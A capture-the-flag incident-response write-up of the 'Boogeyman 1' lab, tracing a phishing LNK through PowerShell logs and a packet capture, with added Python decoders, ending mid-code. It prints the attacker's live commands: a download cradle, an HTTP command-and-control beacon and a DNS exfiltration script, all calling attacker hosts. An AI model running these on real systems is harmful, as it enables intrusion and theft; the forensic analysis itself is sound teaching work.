Boogeyman 1
A new threat actor emerges from the wild using the name Boogeyman. Are you afraid of the Boogeyman?
CONTEXT
Challenge Link: TryHackMe - BoogeyMan 1
I. Background
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

II. Tools and Artifacts
1. Artefact Transfer (lab VM to analysis host)
$ impacket-smbserver jebidiah . -smb2support
ubuntu@tryhackme:~$ cd Desktop
ubuntu@tryhackme:~/Desktop$ zip -r artefacts.zip artefacts/*
[..omitted..]
ubuntu@tryhackme:~/Desktop$ smbclient //10.8.81.251/jebidiah -c 'put artefacts.zip' -N
putting file artefacts.zip as \artefacts.zip (2551.7 kb/s) (average 2551.7 kb/s)
$ unzip artefacts.zip
$ ls artefacts
capture.pcapng dump.eml evtx2json powershell.evtx powershell.json
2. PowerShell Events
$ cat powershell.json | jq -r '.EventID' | sort | uniq -c | sort -bnr
939 4104
44 4100
2 53504
1 40962
1 40961
3. Protocol Hierarchy
$ tshark -r capture.pcapng -T fields -e _ws.col.Protocol | sort | uniq -c | sort -bnr
38769 TCP
3422 TLSv1.3
2060 QUIC
1989 HTTP
1229 DNS
1084 TLSv1.2
82 SSDP
77 TLSv1
74 ARP
14 UDP
12 NBNS
10 MDNS
7 HTTP/XML
5 SSLv2
5 IGMPv3
5 ICMPv6
5 ICMP
5 BROWSER
2 LLMNR
2 DHCP
ANALYSIS
I. Email Analysis
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
1. Exchange Information
Looking at the following headers, the email was sent by Arthur Griffin, from an address on bpakcaging.xyz (a transposed-letter look-alike of the partner's name, B Packaging), to Julianne Westcott:
From: Arthur Griffin <[email protected]>
Date: Fri, 13 Jan 2023 09:25:26 +0000
Subject: Collection for Quick Logistics LLC - Jan 2023
Message-Id: <[email protected]>
Reply-To: Arthur Griffin <[email protected]>
Sender: [email protected]
To: Julianne Westcott <[email protected]>
2. Security Headers
SPF passed (15.235.99.80 is a permitted sender for bpakcaging.xyz) and DKIM passed with two valid signatures, one for bpakcaging.xyz and one for elasticemail.com, the bulk email-delivery service the message was relayed through (HELO pa80.mxout.mta1.net). DMARC is reported as bestguesspass rather than pass: Exchange Online uses that result when the sending domain publishes no DMARC record but the message would have passed had one existed. None of this makes the email legitimate. The checks only prove that the message really came from bpakcaging.xyz, a domain under the attacker's control (they hold its DKIM signing key), so they pass exactly as they would for any properly configured domain; the spoofing is in the look-alike domain name, not in the headers.
Authentication-Results: spf=pass (sender IP is 15.235.99.80)
smtp.mailfrom=bpakcaging.xyz; dkim=pass (signature was verified)
header.d=bpakcaging.xyz;dmarc=bestguesspass action=none
header.from=bpakcaging.xyz;compauth=pass reason=109
Received-SPF: Pass (protection.outlook.com: domain of bpakcaging.xyz
designates 15.235.99.80 as permitted sender) receiver=protection.outlook.com;
client-ip=15.235.99.80; helo=pa80.mxout.mta1.net; pr=C
DKIM-Signature: v=1; a=rsa-sha256; d=bpakcaging.xyz; s=api; c=relaxed/simple;
t=1673601926; h=from:date:subject:reply-to:to:list-unsubscribe:mime-version;
bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
b=dCB9MhhsZqg4h2P9dg5zMjLj7HVS9vt0fXuqEzH8cj6ft+YBJxvZHkF8uc+CeOas6CoICaPu13Q
oL/xVebg3aO8bmlooJWTAZx7mmrh/1ZQBVHm3wvGVI9Xn55nhWzRGoqVOAAPPM6+MEHFwZDIjKDAs
RpDurrnykQeCXCp127k=
DKIM-Signature: v=1; a=rsa-sha256; d=elasticemail.com; s=api;
c=relaxed/simple; t=1673601926;
h=from:date:subject:reply-to:to:list-unsubscribe;
bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
b=jcC3z+U5lVQUJEYRyQ76Z+xaJMrXN2YdjyM8pUl7hgXesQaY7rqSORNRWynpDQ3/CBSllw31eDq
WmoqpFqj2uVy5RXK73lkBEHs5ju1eH/4svHpZLS9+wU/tO5dfZVUImvY32iinpJCtoiMLjdpKYMA/
d5BBGqluALtqy9fZQzM=
3. Email Body
It states that there is an encrypted attachment that can be opened with the password Invoice2023!:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>
<body style="font-size: 13px; font-family: Helvetica;">
<br>
<p>Hi Julianne,</p>
<p>I hope you are well.</p>
<p>I just wanted to drop you a quick note to remind you in respect of document #39586972 is due for payment on January 20, 2023.</p>
<p>I would be grateful if you could confirm everything is on track for payment.</p>
<p>For additional information, kindly see the attached document.<br><br>
You may use this code to view the encrypted file: <strong>Invoice2023!</strong></p>
<p>Best regards,<br>
<strong>Arthur Griffin</strong><br>
Collections Officer<br>
B Packaging Inc.<br><br>
4. Email Attachment
A zip file, Invoice.zip, was attached to the email:
--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==
Content-Type: application/zip
Content-Disposition: attachment; filename="Invoice.zip"; size=908;
Content-Transfer-Encoding: base64
[..omitted..]
--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==--
Decoding the attachment and extracting its contents with the given password, Invoice2023!:
$ cat Invoice.zip_b64 | tr -d '\n' | base64 -d > Invoice.zip
$ file Invoice.zip
Invoice.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
$ unzip Invoice.zip
Archive: Invoice.zip
[Invoice.zip] Invoice_20230103.lnk password: Invoice2023!
zsh: suspended unzip Invoice.zip
Examining the contents of Invoice_20230103.lnk:
$ lnkparse Invoice_20230103.lnk
Windows Shortcut Information:
Link CLSID: 00021401-0000-0000-C000-000000000046
Link Flags: HasTargetIDList | HasName | HasRelativePath | HasWorkingDir | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16637)
File Flags: - (0)
Creation Timestamp: None
Modified Timestamp: None
Accessed Timestamp: None
Icon Index: 0
Window Style: SW_SHOWMINNOACTIVE
HotKey: CONTROL - C {0x4302}
TARGETS:
Index: 78
ITEMS:
Root Folder
Sort index: My Computer
Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
Volume Item
Flags: 0xf
Data: None
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: Windows
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: System32
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: WindowsPowerShell
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: v1.0
File entry
Flags: Is file
Modification time: None
File attribute flags: 0
Primary name: powershell.exe
DATA
Description: Invoice Jan 2023
Relative path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working directory: C:
Command line arguments: -nop -windowstyle hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
Icon location: C:\Users\Administrator\Desktop\excel.ico
EXTRA BLOCKS:
ICON_LOCATION_BLOCK
Target ansi: %USERPROFILE%\Desktop\excel.ico
Target unicode: %USERPROFILE%\Desktop\excel.ico
SPECIAL_FOLDER_LOCATION_BLOCK
Special folder id: 37
KNOWN_FOLDER_LOCATION_BLOCK
Known folder id: 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7
METADATA_PROPERTIES_BLOCK
Version: 0x53505331
Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE
It executes an encoded PowerShell command (-enc takes the base64 of the UTF-16LE script text; -nop skips the profile and -windowstyle hidden keeps the console invisible). Decoded, it downloads a file, update, and runs it in memory with Invoke-Expression, so nothing is written to disk:
iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')
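As an added example (not part of the original writeup), the decoding of that argument string done in Python, generalised to the short forms of -EncodedCommand that powershell.exe also accepts, with URL extraction and a check for the launch flags phishing LNKs typically carry. The argument string is the one from the lnkparse output above; the flag-matching rules and the function names are this example's own.

```python
import base64
import re

# Argument string from the Invoice_20230103.lnk above (the lnkparse "Command line arguments" value).
LNK_ARGS = "-nop -windowstyle hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="

URL_RE = re.compile(r"https?://[^\s'\"()]+")


def is_encoded_command_flag(token: str) -> bool:
    """powershell.exe resolves parameter prefixes, so -e, -en, -enc, ... -EncodedCommand
    all mean the same thing (case-insensitive); -ec is a documented alias."""
    t = token.lower()
    return len(t) >= 2 and (t == "-ec" or "-encodedcommand".startswith(t))


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text, not UTF-8."""
    raw = base64.b64decode(b64.strip("\"'"), validate=True)
    return raw.decode("utf-16-le")


def decode_lnk_arguments(args: str) -> dict:
    """Split the argument string on whitespace (enough for LNK payloads of this shape),
    decode the encoded command if present, and list the URLs the script contacts."""
    tokens = args.split()
    flags, command, i = [], None, 0
    while i < len(tokens):
        if is_encoded_command_flag(tokens[i]) and i + 1 < len(tokens):
            command = decode_encoded_command(tokens[i + 1])
            i += 2
        else:
            flags.append(tokens[i])
            i += 1
    return {"flags": flags, "command": command,
            "urls": URL_RE.findall(command) if command else []}


def suspicious_flags(flags) -> list:
    """Launch options that hide the window or skip the profile/policy; the prefix forms
    (-nop, -w hidden, -ep bypass, -noni) are matched as well as the full names."""
    joined = " ".join(f.lower() for f in flags)
    checks = [(r"-nop\w*", "-NoProfile"),
              (r"-w\w*\s+hidden", "-WindowStyle Hidden"),
              (r"-e[px]\w*\s+bypass", "-ExecutionPolicy Bypass"),
              (r"-noni\w*", "-NonInteractive")]
    return [name for pattern, name in checks if re.search(pattern, joined)]


if __name__ == "__main__":
    result = decode_lnk_arguments(LNK_ARGS)
    print(result["command"])
    print(result["urls"], suspicious_flags(result["flags"]))
```

The same function works on the CommandLine field of a Sysmon or 4688 event; decoding with UTF-8 instead of UTF-16LE is the usual mistake and yields interleaved null bytes.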
II. Log Analysis
Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:
A PowerShell command was executed.
Decoding the payload reveals the starting point of endpoint activities.
1. Timestamp Fix
The events in powershell.json are not in chronological order, so sort them by Timestamp before reading them as a sequence:
$ cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]' > powershell1.json
2. PowerShell Logs
Looking at the script block executions (event 4104) relevant to this case, the attacker was able to do the following. The script blocks are shown JSON-escaped, hence the doubled backslashes and literal \n in the lines below:
$ cat powershell1.json | jq 'select((.EventID|tostring) == "4104") | .ScriptBlockText' | grep -v Set-StrictMode
The initial execution, downloading update from http://files.bpakcaging.xyz:
iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')
Establish an HTTP command-and-control channel to cdn.bpakcaging.xyz:8080. The session id (8cce49b0-b86459bb-27fe2489) is sent in the custom header X-38d2-8f49, and its three parts double as the endpoint paths: one GET to /8cce49b0 registers the beacon, /b86459bb is polled every 0.8 s for a command, which is run with iex, and the combined error and output text is POSTed to /27fe2489 as UTF-8 bytes written in decimal and joined by spaces (the format seen later in the capture):
$s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
Which when expanded and annotated:
$s='cdn.bpakcaging.xyz:8080';            # C2 host and port
$i='8cce49b0-b86459bb-27fe2489';         # session id; its parts are also the endpoint names
$p='http://';
# register the beacon
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};
while ($true){
  # poll for a task; the server answers 'None' when there is nothing to do
  $c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;
  if ($c -ne 'None') {
    $r=iex $c -ErrorAction Stop -ErrorVariable e;   # run the task, collecting errors in $e
    $r=Out-String -InputObject $r;
    # send errors + output back as space-separated decimal byte values
    $t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
  } sleep 0.8
}
Download and run Seatbelt (a host-enumeration tool). The first attempt pulls Invoke-Seatbelt.ps1 from a github.com/.../blob/ URL, which serves the rendered HTML page rather than the raw script, so it would not have produced a usable command; the operator then fetches sb.exe from the attacker's file server into C:\Users\Public\Music and runs it with several argument sets. Every task ends in ;pwd, so the beacon reports the working directory with each result:
cd Users;pwd
cd j.westcott;pwd
ps;pwd
iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd
cd Public;pwd
cd Music;pwd
iwr http://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd
.\\sb.exe all;pwd
.\\sb.exe system;pwd
.\\sb.exe;pwd
.\\sb.exe -group=all;pwd
Seatbelt.exe -group=user;pwd
.\\sb.exe -group=user;pwd
Locate a KeePass database, C:\Users\j.westcott\Documents\protected_data.kdbx:
ls C:\\Users\\j.westcott\\Documents\\protected_data.kdbx;pwd
Download a sqlite3 command-line binary (sq3.exe) and read the Microsoft Sticky Notes database in the user's local AppData, C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite, by querying its Note table:
cd ..\\AppData;pwd
ls Local;pwd
ls Local\\Packages;pwd
cd ..;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState;pwd
iwr http://files.bpakcaging.xyz/sq3.exe -outfile sq3.exe;pwd
.\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\;pwd
.\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite "SELECT * from NOTE limit 100";pwd
Exfiltrate protected_data.kdbx over DNS: the file is read, hex-encoded, split into 50-character chunks, and each chunk is sent as a subdomain of bpakcaging.xyz through nslookup, with the queries addressed directly to 167.71.211.113 rather than to the workstation's configured resolver:
$file='protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
split-path $pwd'\\0x00';pwd
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
$hex = ($bytes|ForEach-Object ToString X2) -join '';;pwd
$split = $hex -split '(\\S{50})'; ForEach ($line in $split) { nslookup -q=A "$line.bpakcaging.xyz" $destination;} echo "Done";;pwd
Cleaned up (JSON escaping removed) and annotated:
$file='protected_data.kdbx';                          # first attempt, relative path
$destination = "167.71.211.113";                      # attacker's DNS server, queried directly
$bytes = [System.IO.File]::ReadAllBytes($file);
split-path $pwd'\0x00';
$file='C:\Users\j.westcott\Documents\protected_data.kdbx';   # retried with the full path
$destination = "167.71.211.113";
$bytes = [System.IO.File]::ReadAllBytes($file);
$hex = ($bytes|ForEach-Object ToString X2) -join '';  # whole file as one upper-case hex string
# -split with a capturing group returns the 50-char chunks interleaved with empty strings,
# so every other nslookup is for the bare name .bpakcaging.xyz
$split = $hex -split '(\S{50})';
ForEach ($line in $split) {
    nslookup -q=A "$line.bpakcaging.xyz" $destination;   # one A query per chunk
}
echo "Done";
III. Network Analysis
Based on the PowerShell logs investigation, we have seen the full impact of the attack:
The threat actor was able to read and exfiltrate two potentially sensitive files.
The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.
1. HTTP Traffic
Looking at the server banners in the HTTP responses for bpakcaging.xyz hosts:
$ tshark -r capture.pcapng -Y 'http.response_for.uri contains "bpakcaging.xyz"' -T fields -e http.server | sort | uniq -c | sort -nr
929 Apache/2.4.1
3 SimpleHTTP/0.6 Python/3.10.7
Two servers were identified, an Apache one and a Python SimpleHTTP one. The latter, with exactly three responses, matches the file server the three payloads found during the log analysis were downloaded from:
$ tshark -r capture.pcapng -Y 'http.server contains "Python"' -T fields -e http.response_for.uri
http://files.bpakcaging.xyz/update
http://files.bpakcaging.xyz/sb.exe
http://files.bpakcaging.xyz/sq3.exe
All responses from the Apache server were for the beacon's three endpoints on http://cdn.bpakcaging.xyz:8080, and the counts match the beacon's behaviour (one registration, many idle polls, one result per executed task):
$ tshark -r capture.pcapng -Y 'http.server contains "Apache"' -T fields -e http.response_for.uri | sort | uniq -c | sort -nr
886 http://cdn.bpakcaging.xyz:8080/b86459bb
42 http://cdn.bpakcaging.xyz:8080/27fe2489
1 http://cdn.bpakcaging.xyz:8080/8cce49b0
In addition, all requests to /27fe2489 are POSTs, as expected from the beacon's result upload:
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489"' -T fields -e http.request.method | sort | uniq -c | sort -nr
42 POST
2. Command Executions
Looking at the POST data of a sample packet, it contains space-separated decimal values: each number is one byte of the UTF-8 output, which is exactly how the beacon encodes it ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' '):
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489"' -T fields -e http.file_data | head -n1
13 13 10 13 10 80 97 116 104 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 45 45 45 45 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 67 58 92 87 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 13 10 13 10 13 10
Now, converting the data of all POST requests from decimal to ASCII (word splitting on $(cat c2.data) already yields one number per iteration):
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489"' -T fields -e http.file_data > c2.data
$ for x in $(cat c2.data); do echo -ne "\x$(printf '%x' "$x")"; done
It shows that a KeePass database was indeed found on the workstation:
Directory: C:\Users\j.westcott\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/13/2023 4:38 PM 2206 protected_data.kdbx
As well as its master password stored in Microsoft Sticky Notes:
Directory: C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/13/2023 4:38 PM DiagOutputDir
-a---- 1/13/2023 4:30 PM 1014 Ecs.dat
-a---- 1/13/2023 4:30 PM 4096 plum.sqlite
-a---- 1/13/2023 4:38 PM 32768 plum.sqlite-shm
-a---- 1/13/2023 5:08 PM 168952 plum.sqlite-wal
Where the password is %p9^3!lL^Mz47E2GaT^y (the remainder of the row is the note's window geometry and metadata):
\id=868150bd-a564-423b-9256-70d3781794b1 Master Password
\id=ad8b52f0-e1bb-40f6-bbf9-47a53f9180ab %p9^3!lL^Mz47E2GaT^y|ManagedPosition=DeviceId:\\?\DISPLAY#Default_Monitor#1&31c5ecd4&0&UID256#{e6f07b5f-ee97-4a90-b076-33f57bf4eaa7};Position=1106,43;Size=320,320|1|0||Yellow|0||||||0||8ca22c0e-ba5e-499a-a86c-7473a53dc6de|74f08724-ccc9-4ce6-94e7-8c99e6cd42c6|638092247397199589||638092247516107079
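As an added example (not the writeup's own code), a Python reconstruction of the beacon session from captured HTTP transactions: it classifies each request by the endpoint paths derived from the session id in section II.2 and inverts the decimal byte encoding the POST bodies above use, pairing each task with the output returned for it. The result body is the one shown above; the transaction list, the poll answers ('None', then 'pwd') and the unrelated request without the session header are constructed for the example.

```python
import re

# From the beacon script in section II.2: the value sent in the X-38d2-8f49 header is the
# session id, and its three parts are the endpoint names.
SESSION_HEADER = "X-38d2-8f49"
SESSION_ID = "8cce49b0-b86459bb-27fe2489"
ROLES = dict(zip(("checkin", "poll", "result"), SESSION_ID.split("-")))
PATH_TO_ROLE = {"/" + name: role for role, name in ROLES.items()}

# First POST body from the capture above, verbatim.
SAMPLE_RESULT_BODY = ("13 13 10 13 10 80 97 116 104 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 "
                      "45 45 45 45 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 "
                      "67 58 92 87 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 13 10 13 10 13 10")

# Constructed transactions in capture order: (method, path, request headers, request body,
# response body). Only the result body is real; the poll answers ('None', then 'pwd') are assumed.
TRANSACTIONS = [
    ("GET", "/8cce49b0", {SESSION_HEADER: SESSION_ID}, "", ""),
    ("GET", "/b86459bb", {SESSION_HEADER: SESSION_ID}, "", "None"),
    ("GET", "/b86459bb", {SESSION_HEADER: SESSION_ID}, "", "pwd"),
    ("POST", "/27fe2489", {SESSION_HEADER: SESSION_ID}, SAMPLE_RESULT_BODY, ""),
    ("GET", "/b86459bb", {}, "", "None"),  # no session header: not this beacon, ignored
]

DECIMAL_BYTES = re.compile(r"^\s*\d{1,3}(?:\s+\d{1,3})*\s*$")


def decode_result_body(body: str) -> str:
    """Invert ([Text.Encoding]::UTF8.GetBytes($e+$r) -join ' '): every token is one byte in decimal."""
    if not DECIMAL_BYTES.match(body):
        raise ValueError("body is not space-separated decimal bytes")
    return bytes(int(tok) for tok in body.split()).decode("utf-8", errors="replace")


def reconstruct_session(transactions, session_id=SESSION_ID):
    """Rebuild the operator's view of one beacon: registration, tasks handed out, output returned."""
    timeline = []
    for method, path, headers, req_body, resp_body in transactions:
        if headers.get(SESSION_HEADER) != session_id:
            continue
        role = PATH_TO_ROLE.get(path)
        if role == "checkin" and method == "GET":
            timeline.append(("checkin", None))
        elif role == "poll" and method == "GET":
            timeline.append(("task", None if resp_body == "None" else resp_body))
        elif role == "result" and method == "POST":
            timeline.append(("output", decode_result_body(req_body)))
    return timeline


def tasks_with_output(timeline):
    """Pair each real task with the output POSTed after it; idle polls are skipped."""
    pairs, pending = [], None
    for kind, payload in timeline:
        if kind == "task" and payload is not None:
            pending = payload
        elif kind == "output" and pending is not None:
            pairs.append((pending, payload))
            pending = None
    return pairs


if __name__ == "__main__":
    for task, output in tasks_with_output(reconstruct_session(TRANSACTIONS)):
        print(f"> {task}\n{output}")
```

Feeding it the real capture means exporting the GET response bodies (the tasks) as well as the POST request bodies, since the commands the operator typed only appear in the server's replies to /b86459bb.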
3. DNS Exfiltration
Based on the decoded POST data, the exfiltration did run as DNS queries for subdomains of bpakcaging.xyz. The alternating errors for the bare name .bpakcaging.xyz come from the script's -split '(\S{50})': because of the capturing group, PowerShell returns the empty strings between chunks as well as the chunks themselves, and the loop issues an nslookup for each of them:
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 38943F8ED485C92DA84BCCE2E2082000C47157BAF0E6A7EF35.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for A00731B6CE6192813F7AC951F0C6460D89A27D91DE15C50920.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 007187B84DD4E121AED3668F75F3761E8AAC3169F81025A5AE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 30D657448F4401890A0400020000000004000D0A0D0A3865AE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for FAA72AA7E2FC9869F30F566E4F58A19582BDA4C0988D8E9F6C.bpakcaging.xyz
[..omitted..]
The chunked exfiltration can also be seen directly in the packet capture. Each name appears twice because dns.qry.name is populated for both the query and the server's reply:
$ tshark -r capture.pcapng -Y "dns" -T fields -e dns.qry.name | grep -E '^[A-F0-9]+\.bpakcaging\.xyz$' | head -n 10
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
Restricting the filter to the outbound queries (ip.dst==167.71.211.113) keeps one copy of each chunk; stripping the domain, concatenating the hex labels in capture order and converting back to bytes retrieves the KeePass database file:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.211.113 and dns" -T fields -e dns.qry.name | grep -E '^[A-F0-9]+\.bpakcaging\.xyz$' | cut -d'.' -f1 | tr -d '\n' | xxd -p -r > protected_data.kdbx
$ file protected_data.kdbx
protected_data.kdbx: Keepass password database 2.x KDBX
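As an added example (not from the original writeup), the reassembly from section II.2's exfiltration script and the tshark/xxd pipeline above done in Python, with the recovered bytes checked against the KDBX 3.x outer-header layout so that a truncated or mis-ordered capture is reported instead of silently producing a broken file. The ten chunk labels are the ones listed above; the DNS log rows (the victim address, the empty-label queries and the reply copies) are constructed to mirror what the capture shows.

```python
import re
import struct
import uuid

EXFIL_DOMAIN = "bpakcaging.xyz"
EXFIL_RESOLVER = "167.71.211.113"
VICTIM_IP = "10.10.10.10"  # assumed; the real address is not needed for the reassembly

# The first ten 50-character chunks from the capture, as listed on this page.
CHUNKS = [
    "03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58",
    "05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB",
    "EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520",
    "00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3",
    "A327BFF48B837B4806080060EA0000000000000710000F22FE",
    "38943F8ED485C92DA84BCCE2E2082000C47157BAF0E6A7EF35",
    "A00731B6CE6192813F7AC951F0C6460D89A27D91DE15C50920",
    "007187B84DD4E121AED3668F75F3761E8AAC3169F81025A5AE",
    "30D657448F4401890A0400020000000004000D0A0D0A3865AE",
    "FAA72AA7E2FC9869F30F566E4F58A19582BDA4C0988D8E9F6C",
]


def constructed_dns_log():
    """(ip.src, ip.dst, dns.qry.name) rows as tshark -T fields would print them. Constructed:
    each chunk is preceded by an empty-label query (the -split capturing-group artefact) and
    every query is followed by the server's reply, which carries the same name."""
    rows = []
    for label in CHUNKS:
        for name in (f".{EXFIL_DOMAIN}", f"{label}.{EXFIL_DOMAIN}"):
            rows.append((VICTIM_IP, EXFIL_RESOLVER, name))   # query
            rows.append((EXFIL_RESOLVER, VICTIM_IP, name))   # reply
    return rows


LABEL_RE = re.compile(r"^([0-9A-Fa-f]+)\." + re.escape(EXFIL_DOMAIN) + r"$")


def reassemble(rows, resolver=EXFIL_RESOLVER):
    """Keep outbound queries only (one copy per chunk), strip the domain, join the hex labels
    in capture order. No de-duplication by value: two identical adjacent chunks of file
    content are legitimate and both must be kept."""
    hexparts = [m.group(1) for src, dst, qname in rows if dst == resolver
                for m in [LABEL_RE.match(qname)] if m]
    return bytes.fromhex("".join(hexparts))


# KDBX 3.x outer header: 8-byte signature, 4-byte version, then (id:1, size:2 LE, data) until id 0.
KDBX_SIG = bytes.fromhex("03D9A29A67FB4BB5")
AES256_UUID = uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff")
FIELD_NAMES = {0: "EndOfHeader", 2: "CipherID", 3: "CompressionFlags", 4: "MasterSeed",
               5: "TransformSeed", 6: "TransformRounds", 7: "EncryptionIV",
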